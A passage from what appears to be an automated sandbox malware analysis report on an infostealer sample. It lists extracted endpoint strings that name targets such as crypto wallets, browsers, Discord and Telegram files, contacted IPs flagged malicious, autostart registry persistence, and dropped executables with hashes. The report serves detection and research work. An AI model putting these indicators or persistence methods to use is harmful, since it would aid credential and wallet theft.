                                                                                                            http://tempuri.org/Endpoint/PartInstalledBrowsersResponse8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000006.00000000.376541265.000000000095C000.00000004.00000020.sdmpfalse
                                                                                                              		high
                                                                                                              http://tempuri.org/Endpoint/PartColdWalletsResponse8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://docs.oasis-open.org/ws-rx/wsrm/200702/SequenceAcknowledgement8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://docs.oasis-open.org/ws-tx/wsat/2006/06/Replay8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://docs.oasis-open.org/ws-tx/wsat/2006/06/Aborted8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.roblox.com/developsvchost.exe, 0000000D.00000003.487674063.000001D408BA0000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.487832537.000001D408BD5000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://api.ip.sb/geoip%USERPEnvironmentROFILE%757C.exe, 00000011.00000002.502575031.0000000003D51000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.620846054.0000000000303000.00000040.00020000.sdmp, 757C.exe, 00000016.00000002.620551936.0000000000402000.00000040.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://crl.ver)svchost.exe, 0000000D.00000002.503887822.000001D4082EB000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		low
                                                                                                                          http://tempuri.org/Endpoint/PartInstalledSoftwaresResponse8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://tempuri.org/Endpoint/PartProtonVPNResponse8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA18433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://corp.roblox.com/parents/svchost.exe, 0000000D.00000003.487674063.000001D408BA0000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.487832537.000001D408BD5000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.487627523.000001D408BA3000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://tempuri.org/Endpoint/PartDiscordResponse8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://docs.oasis-open.org/ws-tx/wsat/2006/06/Prepared8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://support.google.com/chrome/?p=plugin_shockwave8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://tempuri.org/Endpoint/PartFtpConnectionsResponse8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://tempuri.org/Endpoint/PartOpenVPN8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          http://tempuri.org/Endpoint/EnvironmentSettingsResponse8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Cancel8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://tempuri.org/Endpoint/PartOpenVPNResponse8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/Renew8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://docs.oasis-open.org/ws-tx/wsat/2006/06/Durable2PC8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessageD8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.677401695.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://support.google.com/chrome/?p=plugin_wmp8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT/Cancel8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://tempuri.org/Endpoint/GetUpdatesResponsensesResponseoon8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://docs.oasis-open.org/ws-sx/ws-secureconversation/2005128433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://schemas.xmlsoap.org/ws/2006/02/addressingidentity8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://docs.oasis-open.org/ws-rx/wsrm/200702/AckRequested8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://docs.oasis-open.org/ws-tx/wscoor/2006/06/RegisterResponse8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://support.google.com/chrome/?p=plugin_java8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://docs.oasis-open.org/ws-tx/wsat/2006/06/Completion8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/06/addressingex8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://www.g5e.com/G5_End_User_License_Supplemental_Termssvchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Issue8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://tempuri.org/Endpoint/PartProtonVPN8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.677435791.0000000003726000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://docs.oasis-open.org/ws-tx/wsat/2006/06/Commit8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://tempuri.org/Endpoint/PartHardwaresResponse8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            http://tempuri.org/Endpoint/PartTelegramFilesResponse8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ15108433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT/Renew8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://support.google.com/chrome/?p=plugin_divx8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                  		high

                                                                                                                                                                                                  Contacted IPs

                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                                  Public

                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                  194.180.174.100
                                                                                                                                                                                                  		unknownunknown
                                                                                                                                                                                                  		39798MIVOCLOUDMDtrue
                                                                                                                                                                                                  193.56.146.41
                                                                                                                                                                                                  		unknownunknown
                                                                                                                                                                                                  		10753LVLT-10753USfalse
                                                                                                                                                                                                  194.147.85.186
                                                                                                                                                                                                  		geenaldencia9.topRussian Federation
                                                                                                                                                                                                  		61400NETRACK-ASRUfalse
                                                                                                                                                                                                  216.128.137.31
                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                  		20473AS-CHOOPAUStrue
                                                                                                                                                                                                  149.154.167.99
                                                                                                                                                                                                  		t.meUnited Kingdom
                                                                                                                                                                                                  		62041TELEGRAMRUfalse

                                                                                                                                                                                                  Private

                                                                                                                                                                                                  IP
                                                                                                                                                                                                  192.168.2.1
                                                                                                                                                                                                  127.0.0.1

                                                                                                                                                                                                  General Information

                                                                                                                                                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                                                                  Analysis ID:491658
                                                                                                                                                                                                  Start date:27.09.2021
                                                                                                                                                                                                  Start time:19:32:22
                                                                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                  Overall analysis duration:0h 16m 9s
                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                  Report type:light
                                                                                                                                                                                                  Sample file name:pAWNholT8X.exe
                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                                  Number of analysed new started processes analysed:41
                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                  • HDC enabled
                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@39/9@57/7
                                                                                                                                                                                                  EGA Information:Failed
                                                                                                                                                                                                  HDC Information:
                                                                                                                                                                                                  • Successful, ratio: 72.9% (good quality ratio 66.1%)
                                                                                                                                                                                                  • Quality average: 63.7%
                                                                                                                                                                                                  • Quality standard deviation: 33.5%
                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                  • Successful, ratio: 61%
                                                                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                  • Adjust boot time
                                                                                                                                                                                                  • Enable AMSI
                                                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                                                  Warnings:
                                                                                                                                                                                                  Show All
                                                                                                                                                                                                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                                  • HTTP Packets have been reduced
                                                                                                                                                                                                  • TCP Packets have been reduced to 100
                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe
                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 23.54.113.53, 20.82.210.154, 93.184.221.240, 20.54.110.249, 40.112.88.60, 23.10.249.43, 23.10.249.26, 95.100.54.203, 104.26.13.31, 104.26.12.31, 172.67.75.172
                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                  • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                                                                                                                                                  Simulations

                                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                  19:34:13API Interceptor12x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                  19:34:14Task SchedulerRun new task: Firefox Default Browser Agent 9C5C6BA18E04940F path: C:\Users\user\AppData\Roaming\ecrjwib
                                                                                                                                                                                                  19:34:55AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run intel.exe C:\Users\user\AppData\Local\Temp\E52D.exe
                                                                                                                                                                                                  19:35:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run intel.exe C:\Users\user\AppData\Local\Temp\E52D.exe
                                                                                                                                                                                                  19:35:19API Interceptor3x Sleep call for process: FE25.exe modified

                                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                                  IPs

                                                                                                                                                                                                  No context

                                                                                                                                                                                                  Domains

                                                                                                                                                                                                  No context

                                                                                                                                                                                                  ASN

                                                                                                                                                                                                  No context

                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                  No context

                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                  No context

                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\757C.exe.log
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\757C.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):700
                                                                                                                                                                                                  Entropy (8bit):5.346524082657112
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                                                                                                                                  MD5:65CF801545098D915A06D8318D296A01
                                                                                                                                                                                                  SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                                                                                                                                  SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                                                                                                                                  SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\6CB1.exe
                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):131072
                                                                                                                                                                                                  Entropy (8bit):6.744723403447709
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:5nwcUww9skaoTdIK01tsuZ1qfPPxCfVz:5929ksF01qfi
                                                                                                                                                                                                  MD5:2616D3A90B92A23F31A0BA2508076DFC
                                                                                                                                                                                                  SHA1:C6EC7B9A61A59EC370DAA8A7C4C3C4B546ADDB24
                                                                                                                                                                                                  SHA-256:74F077E0666F913CF2A797270B7F9F9747F822C61C896B3314E0A247960D4E01
                                                                                                                                                                                                  SHA-512:89DE787756A9EBECEB11DBCD3FB53A142CA9FBE8298F1D6994B52C87E9530B4FABE43A63C315A6015F60F03F82FAF90630FFA0C5E27E2DCAA12CB090E1B18C13
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L......_.....................H......,........ ....@..........................p.......................................Q..O...,I..<...................................!...............................4..@............ ..|............................text............................... ..`.rdata...1... ...2..................@..@.data...|U...`.......8..............@....rsrc...............V..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\757C.exe
                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):441344
                                                                                                                                                                                                  Entropy (8bit):3.7251930439548104
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:jklT97wnjwqyjha/e1OPRsLIl8w4Lzmf84Nt3hity4ouowJ+:uBjh1JO
                                                                                                                                                                                                  MD5:287976D8C62519CBB494CF31916CE26E
                                                                                                                                                                                                  SHA1:E9749FE784AEBA486115EE4CEF0FE8400439D613
                                                                                                                                                                                                  SHA-256:91802CC2E767E5FC498A4F8068B97DE249A16B5AA05E085354862E5CC3F17D3B
                                                                                                                                                                                                  SHA-512:9E63B59777B413D9D62C68EE3F7A52E487EA6A563603174FBCCC5EB8893009B04A11D37E7D29D286E26BB7039C84027493A605947B0472AFFA73FAFBC5F0D29F
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Eo................0.................. ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............/...........................................................0..........~....u....s....z&.....*.................2(.... ....j*....r...p(....*.s....%.}..........s....o....9....s....z*....(.........*2.s....(....*...v.(......rh..p~....o....(....*....{....*.0..s........:....~........(......~....:$.........(.........(....(....(.........~....{....~.....o....~....o....(....o....}....*..0...........(.....(.....o....*.6..(....(....*...0..8.......s.......8............i].a(..
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\8433.exe
                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2766048
                                                                                                                                                                                                  Entropy (8bit):7.719426833917887
                                                                                                                                                                                                  Encrypted:false
